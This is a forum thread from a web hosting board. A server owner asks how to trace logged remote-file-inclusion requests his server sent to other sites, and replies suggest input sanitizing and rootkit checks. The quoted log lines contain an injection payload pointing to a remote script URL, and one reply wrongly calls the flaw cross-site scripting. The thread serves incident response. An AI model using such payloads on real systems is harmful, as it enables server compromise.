Help - Search - Members - Calendar
Full Version: Where to start
The Planet Forums > System Administration > Web Hosting
thedude
Oct 10 2007, 02:38 PM
TP support sent me an email showing these logs.


CODE
Request: neysajin.com 70.85.x.x - - [10/Oct/2007:01:47:47 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"

Request: legacyfamily.org 70.85.x.x - - [10/Oct/2007:01:51:08 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 546 "-""libwww-perl/5.808" - "-"

Request: leeastwoodarch.com 70.85..x.x - - [10/Oct/2007:01:57:12 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 548 "-""libwww-perl/5.808" - "-"

Request: aggiebsm.org 70.85..x.x - - [10/Oct/2007:01:57:37 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"


However I'm somewhat unsure of where to look.

Obviously (at least I think so), I see that index.php is being used to attempt an HTTP exploit on another webserver. Indicated by the ?lang=en&page=xxxx part.

Any idea as to where I might look to see exactly which index.php is being used? lol..or maybe which directory?

Thanks
thedude
Oct 11 2007, 07:40 AM
QUOTE (thedude @ Oct 10 2007, 03:38 PM) *
TP support sent me an email showing these logs.
CODE
Request: neysajin.com 70.85.x.x - - [10/Oct/2007:01:47:47 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"

Request: legacyfamily.org 70.85.x.x - - [10/Oct/2007:01:51:08 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 546 "-""libwww-perl/5.808" - "-"

Request: leeastwoodarch.com 70.85..x.x - - [10/Oct/2007:01:57:12 -0400]
"GET /index.php?lang=en&page=http://drpepper.gigacities.net/id.txt?
HTTP/1.1" 500 548 "-""libwww-perl/5.808" - "-"

Request: aggiebsm.org 70.85..x.x - - [10/Oct/2007:01:57:37 -0400]"GET
/index.php?lang=en&page=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 500
542 "-""libwww-perl/5.808" - "-"


However I'm somewhat unsure of where to look.

Obviously (at least I think so), I see that index.php is being used to attempt an HTTP exploit on another webserver. Indicated by the ?lang=en&page=xxxx part.

Any idea as to where I might look to see exactly which index.php is being used? lol..or maybe which directory?

Thanks



Found the problem...as is the usual case, bad PHP code on a domain allowed some perl files to be uploaded that were exploiting the PHP code.
James Jhurani
Oct 11 2007, 09:48 AM
not quite.

What happened is the attacker used the "page" variable to make your server read, and execute the php code from a remote location. This is called a cross site scripting vulnerability(XSS vulnerability for short). It can be fixed by properly sanitizing your variables.
thedude
Oct 11 2007, 10:02 AM
Close enough damnit! lol


Unfortunately, I'm not much of a programmer, and the code was some opensource code that I was using. I haven't used it in forever though, so I went ahead and just deleted it.
thedude
Oct 11 2007, 10:13 AM
Any good sites out there that cover how to sanitize the variables in case I ever need to do it?


Thanks
Matt
James Jhurani
Oct 11 2007, 01:44 PM
QUOTE (thedude)
Close enough damnit! lol


lol


QUOTE (thedude)
Any good sites out there that cover how to sanitize the variables in case I ever need to do it?


check out http://phpro.org/tutorials/Filtering-Data-with-PHP.html

It definitely is not the most fun thing in the world. Especially when your writing something at 3am, and you just want it to work properly lol. However, no matter how good your site/code is, if it isn't secure, then it's not going to last.
thedude
Oct 11 2007, 02:28 PM
Thanks!
dynamicnet
Oct 21 2007, 10:38 AM
Greetings:

Our company sent in the complaint in question from our security monitoring service where we believe http://www.dynamicnet.net/customer/h-spher...6_go_tattle.htm helps.

That stated, the attacking IP is 70.85.x.x which was trying to use Web-based injection to load http://drpepper.gigacities.net/id.txt on to the target site.

The server in question is probably compromised via one to many methods.

Some methods of finding the compromise(s) is by using root kit checkers such as

chkrootkit
rkhunter
ossec-rootcheck

Other methods involve checking common areas of a server for hacks such as

/var/spool/cron (Apache, httpd, nobody should not own any cron jobs)
/var/spool/samba
/var/spool/vbox
/var/spool/squid
/dev/shm
/tmp
/var/tmp

There is also looking for files in home user directories, etc.

http://forums.theplanet.com/index.php?showtopic=59486 does a good job in terms of places to start.

Learning the process tree (ps) along with using lsof can be life savers in terms of finding true culprits.

Thank you.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2010 Invision Power Services, Inc.